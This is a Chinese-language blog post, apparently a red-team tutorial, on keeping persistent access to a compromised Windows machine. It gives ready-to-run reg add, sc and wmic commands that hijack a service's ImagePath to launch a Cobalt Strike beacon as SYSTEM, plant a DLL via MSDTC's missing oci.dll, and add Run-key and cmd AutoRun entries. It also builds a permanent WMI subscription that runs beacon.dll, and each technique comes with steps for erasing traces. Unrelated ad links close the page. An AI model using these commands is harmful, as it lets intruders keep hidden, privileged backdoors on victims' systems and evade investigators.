組策略

需要能遠程登錄到桌面

輸入gpedit.msc打開組策略，需要管理員賬號

在用戶與計算機中的windows設置中均可以對腳本進行編輯，用戶策略是用戶權限，計算機策略是system權限

清理痕迹

打開組策略找到腳本，刪除即可

修改計算器啟動服務調用的程序

啟動服務有些需要手動啟動，比如IEEtwCollectorService 服務，這裏做後面的思路是，該服務本身對計算機運行沒有影響，因此將其手動啟動改成自動啟動，並將其運行的腳本改成木馬後門

類比一下windows10 沒有IEEtwCollectorService 服務可以選擇COMSysApp服務

篡改運行腳本
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\IEEtwCollector Service" /v ImagePath /t REG_EXPAND_SZ /d "c:\users\public\downloads\beacon.exe" /f

設置自動啟動
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\IEEtwCollector Service" /v Start /t REG_DWORD /d 2 /f 

啟動服務
sc start IEEtwCollectorService 

返回的是system權限

清理痕迹

將篡改的註冊表改回來，並且刪除目標木馬

MSDTC 服務

MSDTC 服務默認會加載一個在windowss/system32下的不存在的 oci.dll，思路是將cs.dll 改名為oci.dll，放到system32下即可，該方法需要管理員用戶權限

清理痕迹

刪除的時候因為被多個進程調用，因此刪不掉，這裏可以換個思路修改其名稱，重啟再刪除

啟動項

啟動項是會去指定文件夾下運行文件夾下的所有服務，這個文件夾是

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

也會運行以下註冊表中的腳本

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "c:\users\public\downloads\payload.exe" /f

需要高權限
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "c:\users\public\downloads\payload.exe" /f

清理痕迹

刪除文件夾下的木馬或者刪除註冊表中添加的惡意木馬註冊表，並找到木馬位置刪除

cmd 啟動劫持

在cmd啟動時回去註冊表中查看是否有AutoRun的健值，如果有則會運行其中的腳本

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "c:\users\public\downloads\payload.exe" /f

清理痕迹

在管理員權限下刪除註冊表的值即可

wmic事件

註冊一個事件過濾器，該過濾器是開機 2 分鐘到 2 分半鍾，由於是永久 WMI 事 件訂閱，故需要管理員權限，最終獲取到權限也是 system 權限
wmic 
/NAMESPACE:"\\root\subscription"PATH__EventFilterCREATE Name="TestEventFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 20 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=120 AND TargetInstance.SystemUpTime < 150" 


註冊一個事件消費者，這裏寫入了要執行的命令，是用 rundll32 啟動 cs 的 dll
wmic /NAMESPACE:"\\root\subscription"PATHCommandLineEventConsumer CREATE Name="TestConsumer2",ExecutablePath="C:\Windows\System32\cmd.exe",CommandLineTemplate=" /c rundll32 c:\users\public\downloads\beacon.dll #5" 

綁定事件 過濾器和事件消費者
wmic /NAMESPACE:"\\root\subscription"PATH__FilterToConsumerBindingCREATE Filter="__EventFilter.Name=\"TestEventFilter\"", Consumer="CommandLineEventConsumer.Name=\"TestConsumer2\""

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※超省錢租車方案

※別再煩惱如何寫文案,掌握八大原則!

※回頭車貨運收費標準

※教你寫出一流的銷售文案?

※產品缺大量曝光嗎?你需要的是一流包裝設計!

※廣告預算用在刀口上，台北網頁設計公司幫您達到更多曝光效益